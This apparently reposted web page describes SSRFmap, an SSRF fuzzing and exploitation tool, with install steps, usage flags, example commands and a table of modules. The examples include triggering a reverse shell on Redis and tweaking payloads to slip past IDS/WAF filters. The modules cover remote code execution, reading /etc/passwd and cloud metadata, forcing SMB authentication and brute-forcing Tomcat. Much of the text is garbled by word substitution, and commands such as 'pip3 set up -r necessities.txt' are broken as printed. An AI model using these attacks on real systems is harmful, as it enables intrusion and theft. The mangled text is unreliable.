SSRFMap – Automated SSRF Fuzzer And Exploitation Device

SSRFMap – Automated SSRF Fuzzer and Exploitation Device

SSRF are sometimes used to leverage actions on different companies, this framework goals to seek out and exploit these companies simply. SSRFmap takes a Burp request file as enter and a parameter to fuzz.

Server Facet Request Forgery or SSRF is a vulnerability by which an attacker forces a server to carry out requests on their behalf.

Primary set up from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 set up -r necessities.txt
python3 ssrfmap.py

Utilization: 

ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [–lhost LHOST] [–lport LPORT] [–uagent USERAGENT]
                  [–ssl [SSL]] [–level [LEVEL]]

Elective arguments:

  -h, –help          present this assist message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to focus on
  -m MODULES          SSRF Modules to allow
  -l HANDLER          Begin an handler for a reverse shell
  –lhost LHOST       LHOST reverse shell
  –lport LPORT       LPORT reverse shell
  –uagent USERAGENT  Consumer Agent to make use of
  –ssl [SSL]         Use HTTPS with out verification
  –level [LEVEL]     Stage of check to carry out (1-5, default: 1)

The default method to make use of this script is the next.

# Launch a portscan on localhost and skim default recordsdata
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles,portscan


# Launch a portscan towards an HTTPS endpoint utilizing a customized user-agent
python ssrfmap.py -r knowledge/request.txt -p url -m portscan –ssl –uagent “SSRFmapAgent”


# Triggering a reverse shell on a Redis
python ssrfmap.py -r knowledge/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242


# -l create a listener for reverse shell on the required port
# –lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload
# –level : capability to tweak payloads in an effort to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> …

A fast method to check the framework may be achieved with knowledge/instance.py SSRF service.

FLASK_APP=knowledge/instance.py flask run &
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles

Modules

The next modules are already applied and can be utilized with the -m argument.

Identify    Description
fastcgi    FastCGI RCE
redis    Redis RCE
github    Github Enterprise RCE
zabbix    Zabbix RCE
mysql    MySQL Command execution
docker    Docker Infoleaks by way of API
smtp    SMTP ship mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the community
readfiles Learn recordsdata comparable to /and so forth/passwd
alibaba Learn recordsdata from the supplier (e.g: meta-data, user-data)
aws Learn recordsdata from the supplier (e.g: meta-data, user-data)
gce Learn recordsdata from the supplier (e.g: meta-data, user-data)
digitalocean Learn recordsdata from the supplier (e.g: meta-data, user-data)
socksproxy SOCKS4 Proxy
smbhash Power an SMB authentication by way of a UNC Path
tomcat Bruteforce assault towards Tomcat Supervisor

Download SSRFMap